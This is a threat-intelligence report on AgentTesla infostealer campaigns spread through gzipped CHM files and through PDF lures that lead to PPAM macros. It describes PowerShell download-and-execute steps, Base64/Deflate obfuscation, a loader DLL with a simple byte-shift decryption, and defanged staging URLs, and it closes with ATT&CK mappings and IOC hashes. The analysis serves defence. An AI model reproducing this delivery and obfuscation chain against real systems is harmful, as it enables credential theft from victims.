Recent Attacks showcase AgentTesla spreading via CHM and PDF Files
- This analysis emphasizes an interesting infection pathway to disseminate AgentTesla, a well-known malware strain.
- The infection is initiated via a spam email containing a CHM file, which, upon execution, fetches a PowerShell script to start the AgentTesla infection on the victim’s system.
- The PowerShell script employs encoded binary strings as camouflage for malicious code.
- The malicious PowerShell script further drops a loader DLL file built on the .NET framework, which injects the AgentTesla payload into system executables.
- In another campaign, a PDF file is employed to entice unsuspecting users into downloading a PPAM file, resulting in AgentTesla malware infection.
AgentTesla is an information stealer built on the .NET framework, designed to infiltrate computers and surreptitiously extract sensitive information from the victim’s machine. It initially appeared in 2014, and since then, it has been continuously evolving and spreading worldwide. Its primary objective is to harvest victim credentials and personal data. Furthermore, AgentTesla possesses functionalities such as keylogging, capturing clipboard data, accessing the file system, and transferring data to a Command and Control (C&C) server.
AgentTesla typically enters a system through spam emails that include attachments with file extensions like .doc, .xls, and .ppt. These attachments often contain macros, which, when executed, facilitate the installation of the AgentTesla malware onto the victim’s system. Recently, CRIL also identified and authored an analysis that AgentTesla malware reaches users with malicious control panel files.
On October 4, 2023, CRIL encountered a malicious Gzip compressed file within VirusTotal (VT). This Gzip file contained a CHM file that triggered the initiation of the AgentTesla infection.
AgentTesla malware’s distribution through the CHM file was identified by researchers @JAMESWT_MHT in September 2022 and subsequently by @smica83 in December 2022. In previous campaigns, the CHM file downloaded the PowerShell scripts, containing loader DLL and AgentTesla as obfuscated binary strings. Finally, AgentTesla is injected into RegAsm.exe.
In the most recent campaign, CRIL identified a CHM file that has been compressed using Gzip and is highly likely delivered using malicious spam email. The crafted CHM file acts as a lure. It appears to be targeting individuals or entities involved in network engineering, telecommunications, or information technology based on the content available in the CHM file, as shown in Figure 1.
When the user opens this CHM file, it covertly downloads a PowerShell script from the remote server and executes it. To avoid detection, the PowerShell script is Base64-encoded and Deflated. This deflated Base64-encoded string, in turn, contains another layer of Base64 encoding, which further contains a loader DLL file. The DLL file serves as a loader responsible for loading AgentTesla malware found within one of the resources found within the file.
We have also observed another campaign using PDF files to distribute AgentTesla Malware. This PDF employs two distinct methods to disseminate the malware. In the first method, the PDF triggers a PowerShell command to load the AgentTesla malware. The second method displays a fake message when the PDF is opened, leading to the download of a PPAM file when users click on the “Reload” button. This PPAM file is responsible for executing PowerShell commands that, in turn, download the AgentTesla malware.
AgentTesla Spreading Via CHM files:
The figure below shows the overall infection chain of the AgentTesla Campaign.
The initial phase of the infection process commences with a malicious spam email, which delivers a Gzip-compressed file named “PO-9596996.gz” with a SHA256 hash value of 5df434b86519a9cda49dacc6dd625d8b8fc70c1479004669ed09b35d37816fce. Within this Gzip archive, there is an embedded CHM file named “PO-9596996.chm”, with a SHA256 hash value of 00dc35f39503924bff98f40ac52100ab2882ed22cdf8a3e4a9ec2f1797736aaa.
Upon execution, the CHM file runs a PowerShell command, which downloads a PowerShell script named “nm.txt” from a server and subsequently executes it, as shown below.
The PowerShell script “nn.txt” comprises a string that has been encoded using Base64 and subsequently deflated. The figure below shows the contents of the “nn.txt”.
During the execution of the PowerShell script, the Base64 encoded string is decoded and then inflated, revealing another Base64-encoded string, which is actually a malicious Dynamic Link Library (DLL). The PowerShell script further handles the loading of this decoded DLL, which is stored in the “A” variable, followed by the creation of an instance of class “B,” defined in the DLL file.
The figure below shows the second base64-encoded string.
The decoded DLL is named Hur.dll and has a sha256 value of 6555ac945d8010dc3e77d037298fffaf506826bb0ecaa12880de18ad04435b7f. Within the resource section of the Hur.dll file, encrypted data is present, which is loaded and injected by the Hur.dll.
To encrypt the data, a key, represented as “1A,” was added to the byte values. By subtracting this key, the final AgentTesla binary was successfully derived. Upon decryption, it reveals the presence of AgentTesla malware. The figure below shows the decrypted data.
The figure below shows the decrypted AgentTesla Malware, which calls several APIs for various malicious purposes.
AgentTesla Spreading via PDF files:
In addition to the CHM campaign, on September 8, 2023, we also observed another campaign in VirusTotal that employs a PDF file to entice unsuspecting users into downloading AgentTesla Malware. Notably, this PDF file employs two distinct methods to deliver malicious files to the victim’s machine.
Parallely, the pdf file opens a fake message, stating, “Pdf reader not supported! Reload to Download pdf!” Following this pop-up, the main PDF document loads but displays an error message, as shown in the figure below.
When the user clicks on the Reload button, it triggers a redirection to the website “hxxps://booking-comdetails[.]blogspot[.]com/.” During our analysis, the website was inaccessible, but it had previously hosted a PPAM file named “lnvoice_1332936990 (1).ppam (copy).”
The PPAM file does not contain any PPT file but only the VBA macro, which contains code to download and execute the PowerShell script from the previously mentioned URL “htlbook.blogspot[.]com/atom.xml”. The figure below shows the macro code.
The latter stages of the infection technique, as executed by the downloaded PowerShell, bear a strong resemblance to the methods outlined in our earlier AgentTesla analysis.
This analysis uncovers a resourceful approach used by AgentTesla malware to proliferate. Through its continual adaptation, AgentTesla enhances its ability to elude detection, establishing itself as an enduring menace to both organizations and individuals.
AgentTesla’s primary objective is the pilfering of sensitive data, and its tactical shifts sustain its significant threat to organizations, enabling it to persistently access valuable information. Its flexibility permits the exploitation of various attack vectors, such as email attachments, malicious links, and document-based infiltrations, rendering it a versatile adversary. The ceaseless evolution of its tactics poses a formidable challenge in eradication, compelling security systems and researchers to perpetually adjust their countermeasures.
- Implement strong email filtering solutions to detect and block spam emails, phishing attempts, and malicious attachments.
- Refrain from opening untrusted links and email attachments without verifying their authenticity.
- Use a reputed antivirus and Internet security software package on your connected devices, including PC, laptop, and mobile.
- Refrain from opening untrusted links and email attachments without verifying their authenticity.
MITRE ATT&CK® Techniques
|Initial Access (TA0001)||Phishing (T1566.001)||TAs send phishing emails with malicious Attachments|
|Execution (TA0002)||User Execution (T1203)||User opens the malicious attachments|
|Execution (TA0002)||Command and Scripting|
|PowerShell commands are used to download and execute additional payloads on the system|
|Persistence (TA0003)||Registry Run Keys /|
Startup Folder (T1547.001)
|Malware adding a run entry/Startup for persistence.|
|Defense Evasion (TA0005)||Masquerading (T1036.006)||PowerShell script is masquerading as text file|
|Collection (TA0009)||Data from Local System|
|The malware collects sensitive data from|
|Command and Control (TA0011)||Application Layer Protocol : Web Protocols (T1437.001)||Communicated with C&C server using HTTP|
|Exfiltration (TA0010)||Exfiltration Over C2 Channel (T1041)||Exfiltration Over C2 Channel|
Indicators of Compromise (IOCs)
|a4de9d739162b9840c6cfd684ea8d791 bb43ced4c734844119ebeffba5ff960692061e0b a56f11445182406c82a5448a978ab72faf540591e94dbecbb13237413e687bd4||MD5 SHA1 SHA256||Malicious CHM|
|c7ebda0095926643110fc359e747ffb3 c59402e8f69f25cf89d10df772796671ed96da2a d0c65ad64661320b438d940cb46019a3a282d4b5040d593bcbb5c21616116813||MD5 SHA1 SHA256||Malicious CHM|
|6665f9392350bfa49a2cdee6afcc297b 358e396e8291d6d92691c60791f474573a8adc18 00dc35f39503924bff98f40ac52100ab2882ed22cdf8a3e4a9ec2f1797736aaa||MD5 SHA1 SHA256||Malicious CHM|
|0bcc3c271ee55c5da266c8bbc22f3208 9f71ed6953196b2c1e70bb86df3c9773567c0bea dcdc5377b6fa7bf42731c95f23b04072123053910b120da943ba183fbc511665||MD5 SHA1 SHA256||Malicious CHM|
|cf87fd3ac04ab84401009808e0c1662a 78f25cc19b474922c372552fa5fc2ea4a1c5a01b f34400e75903275789e15209840fe4d425744ad7ffe8e7c86f5545bb5bfdff72||MD5 SHA1 SHA256||Malicious CHM|
|0431f491949e0462e1eb13bf4f3b2191 1d1b203bba63b1393a45f4ed5c3fccaf222b2aa2 da0ff5afc0fe3bb6fd769c501c4e5c07820f411005565c53b80f41c6bd679f72||MD5 SHA1 SHA256||Malicious CHM|
|0cadf56216e663ff2a8f3882ed0fb681 1cc259aa315090a50237144dc0926be0abea4190 92533be6c7fdd0cb591fa4a9d760b49f441703545404f5ce780403092056341f||MD5 SHA1 SHA256||lnvoice_1332936990.pdf|
|3a8ac8048d42bcd3b15c44b2836cc634 ec52ae1ec9e84a57d346425e12d9582efa75ad55 118a2cbcf9272be3651fd0781da7e609e6b5972a341a187f1a20d7269b2a6dc6||MD5 SHA1 SHA256||\lnvoice_1332936990 (1).ppam (copy)|